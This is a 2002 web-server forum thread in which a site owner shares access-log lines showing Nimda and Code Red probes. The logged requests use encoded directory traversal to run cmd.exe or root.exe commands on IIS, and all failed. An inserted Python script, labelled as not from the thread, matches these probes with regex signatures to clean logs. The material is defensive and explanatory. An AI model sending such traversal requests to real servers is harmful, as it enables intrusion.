Is anyone else getting hammered like this?

Aprelium Forum Index -> General Questions
POMP


Joined: 04 Apr 2002
Posts: 15
Location: Houston, TX

PostPosted: Sat Apr 06, 2002 10:34 pm    Post subject: Is anyone else getting hammered like this?

When I view my access log, I get repeated break-in attempts by what I can only assume are PCs or IIS servers that have been infected with Nimda or Code Red. Does anyone know of a way to perhaps slow this activity down a bit?

Here is a portion of my access.log so you can see what I'm talking about:

66.24.164.131 - - [06/Apr/2002:07:55:35 +1133] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:07:55:35 +1133] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:07:55:36 +1133] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:07:55:36 +1133] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:07:55:36 +1133] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:07:55:36 +1133] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 438 "" ""
66.24.164.131 - - [06/Apr/2002:07:55:36 +1133] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 438 "" ""
66.24.164.131 - - [06/Apr/2002:07:55:36 +1133] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 438 "" ""
66.24.164.131 - - [06/Apr/2002:07:55:36 +1133] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:07:55:37 +1133] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 438 "" ""
66.24.164.131 - - [06/Apr/2002:07:55:37 +1133] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:07:55:40 +1133] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:07:55:40 +1133] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:07:55:40 +1133] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:08:28:27 +1133] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:08:28:28 +1133] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:08:28:28 +1133] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:08:28:28 +1133] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:08:28:28 +1133] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:08:28:28 +1133] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 438 "" ""
66.24.164.131 - - [06/Apr/2002:08:28:28 +1133] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 438 "" ""
66.24.164.131 - - [06/Apr/2002:08:28:29 +1133] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 438 "" ""
66.24.164.131 - - [06/Apr/2002:08:28:29 +1133] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:08:28:29 +1133] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 438 "" ""
66.24.164.131 - - [06/Apr/2002:08:28:29 +1133] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:08:28:29 +1133] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:08:28:29 +1133] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:08:28:30 +1133] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:08:30:23 +1133] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:08:30:23 +1133] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:08:30:23 +1133] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:08:30:23 +1133] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:08:30:23 +1133] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:08:30:24 +1133] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 438 "" ""
66.24.164.131 - - [06/Apr/2002:08:30:24 +1133] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 438 "" ""
66.24.164.131 - - [06/Apr/2002:08:30:24 +1133] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 438 "" ""
66.24.164.131 - - [06/Apr/2002:08:30:24 +1133] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:08:30:24 +1133] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 438 "" ""
66.24.164.131 - - [06/Apr/2002:08:30:24 +1133] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:08:30:25 +1133] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:08:30:25 +1133] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:08:30:25 +1133] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:09:26:53 +1133] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:09:26:53 +1133] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:09:26:53 +1133] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:09:26:53 +1133] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:09:26:53 +1133] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:09:26:56 +1133] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 438 "" ""
66.24.164.131 - - [06/Apr/2002:09:26:57 +1133] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 438 "" ""
66.24.164.131 - - [06/Apr/2002:09:26:57 +1133] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 438 "" ""
66.24.164.131 - - [06/Apr/2002:09:26:57 +1133] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:09:26:57 +1133] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 438 "" ""
66.24.164.131 - - [06/Apr/2002:09:26:57 +1133] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:09:26:57 +1133] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:09:26:58 +1133] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:09:26:58 +1133] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" ""
aprelium


Joined: 22 Mar 2002
Posts: 6800

PostPosted: Sun Apr 07, 2002 2:01 am    Post subject: Is anyone else getting hammered like this?

POMP wrote:

When I view my access log, I get repeated break-in attempts by what I can only assume are PCs or IIS servers that have been infected with Nimda or Code Red. Does anyone know of a way to perhaps slow this activity down a bit?

Unfortunately, there are always people attempting to discover broken IIS servers.
The good news is that Abyss Web Server isn't affected by such attacks. It always responds with a "404 Not found" error.
The less good news is that there is no way to filter these attacks and not log them. Our advice is to disable logging if you notice that your file gets huge after a few minutes of use due to multiple attack trials.
_________________
Support Team
Aprelium - http://www.aprelium.com
decrepidloser
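Since the server itself cannot suppress these log entries, the practical defender's move is to post-process access.log: recognise the worm probe patterns visible in POMP's excerpt (root.exe, cmd.exe, the %255c / %c0%af traversal encodings, Code Red's default.ida), count them per source address, and write everything else to a clean log. The script below is an added example, not code from the thread, from Aprelium or from Abyss Web Server; the signature names and the sample log lines are constructed for illustration.

```python
#!/usr/bin/env python3
"""Split a Common Log Format access log into worm noise and real traffic.

Added example (not from the forum thread or from Abyss Web Server).
Signature names and SAMPLE_LOG are constructed for illustration.
"""
import re
import sys
from collections import Counter

# Constructed sample, modelled on the access.log excerpt in the thread.
SAMPLE_LOG = """\
66.24.164.131 - - [06/Apr/2002:07:55:35 +1133] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:07:55:36 +1133] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:07:55:37 +1133] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" ""
10.0.0.7 - - [06/Apr/2002:08:01:02 +1133] "GET /index.html HTTP/1.1" 200 1532 "" "Mozilla/4.0"
10.0.0.9 - - [06/Apr/2002:08:02:10 +1133] "GET /default.ida?XXXX HTTP/1.0" 404 436 "" ""
"""

# Common Log Format: ip ident user [time] "method path proto" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Request shapes used by Nimda and Code Red II propagation. The names are
# this example's own labels, not an official taxonomy.
WORM_PATTERNS = [
    ("nimda-root.exe", re.compile(r"/root\.exe", re.I)),
    ("nimda-cmd.exe", re.compile(r"/cmd\.exe", re.I)),
    # overlong UTF-8 forms of '/' and '\' (%c0%af, %c1%9c, %c1%1c, %c0%2f)
    ("unicode-traversal", re.compile(r"%c[01]%(1c|9c|af|2f)", re.I)),
    # double-decoded '\' or '/' (%255c, %252f, %25%35%63)
    ("double-decode-traversal", re.compile(r"%25(5c|2f|%35%63)", re.I)),
    ("codered-ida", re.compile(r"/default\.ida", re.I)),
]


def parse_line(line):
    """Return the CLF fields of one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(path):
    """Return the list of worm signature names that match a request path."""
    return [name for name, rx in WORM_PATTERNS if rx.search(path)]


def split_log(text):
    """Return (hits_per_ip, hits_per_signature, clean_lines).

    Lines that do not parse are kept in clean_lines so no evidence is lost.
    """
    per_ip, per_sig, clean = Counter(), Counter(), []
    for line in text.splitlines():
        rec = parse_line(line)
        tags = classify(rec["path"]) if rec else []
        if not tags:
            clean.append(line)
            continue
        per_ip[rec["ip"]] += 1
        per_sig.update(tags)
    return per_ip, per_sig, clean


def noisy_sources(per_ip, threshold=10):
    """Addresses whose probe count reaches the threshold, busiest first.

    Useful as input to a firewall deny list; the threshold is a policy choice.
    """
    return [ip for ip, n in per_ip.most_common() if n >= threshold]


if __name__ == "__main__":
    # Usage: filter_worm_noise.py access.log > clean.log   (summary on stderr)
    text = open(sys.argv[1], encoding="latin-1").read() if len(sys.argv) > 1 else SAMPLE_LOG
    per_ip, per_sig, clean = split_log(text)
    for sig, n in per_sig.most_common():
        print(f"{sig:25s} {n}", file=sys.stderr)
    for ip in noisy_sources(per_ip, threshold=1):
        print(f"probes from {ip}: {per_ip[ip]}", file=sys.stderr)
    sys.stdout.write("\n".join(clean) + ("\n" if clean else ""))
```

Run without arguments it processes the constructed sample; with a path it reads that file and prints the cleaned log to stdout and the per-signature and per-address counts to stderr. The unparsable-line rule errs toward keeping data: a filter that silently drops what it cannot parse is the wrong tool for a log you may later need as evidence.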


Joined: 24 Oct 2002
Posts: 2

PostPosted: Thu Oct 24, 2002 11:33 pm    Post subject: Re: Is anyone else getting hammered like this?

aprelium wrote:

POMP wrote:

When I view my access log, I get repeated break-in attempts by what I can only assume are PCs or IIS servers that have been infected with Nimda or Code Red. Does anyone know of a way to perhaps slow this activity down a bit?

Unfortunately, there are always people attempting to discover broken IIS servers.
The good news is that Abyss Web Server isn't affected by such attacks. It always responds with a "404 Not found" error.
The less good news is that there is no way to filter these attacks and not log them. Our advice is to disable logging if you notice that your file gets huge after a few minutes of use due to multiple attack trials.

Well, is there a way to redirect the requested URLs or files to another site, e.g. www.microsoft.com, so maybe they will fix their broken server?
aprelium


Joined: 22 Mar 2002
Posts: 6800

PostPosted: Fri Oct 25, 2002 11:31 am    Post subject: Re: Is anyone else getting hammered like this?

decrepidloser wrote:
Well, is there a way to redirect the requested URLs or files to another site, e.g. www.microsoft.com, so maybe they will fix their broken server?

This is an idea we can consider :wink:
But, in order to solve this problem, we will provide Abyss Web Server (in a future version) with a mechanism that stops logging such requests (and of course, it will continue to deny them as it already does).
_________________
Support Team
Aprelium - http://www.aprelium.com
aharcup


Joined: 28 Feb 2003
Posts: 1

PostPosted: Fri Feb 28, 2003 2:52 pm    Post subject: Checkout Labrea

Labrea can really tie up the resources of the infected NIMDA server.

Check out http://www.hackbusters.net/LaBrea/ to find out more.

I have used this piece of code and it rocks.

Andy

:D
All times are GMT + 1 Hour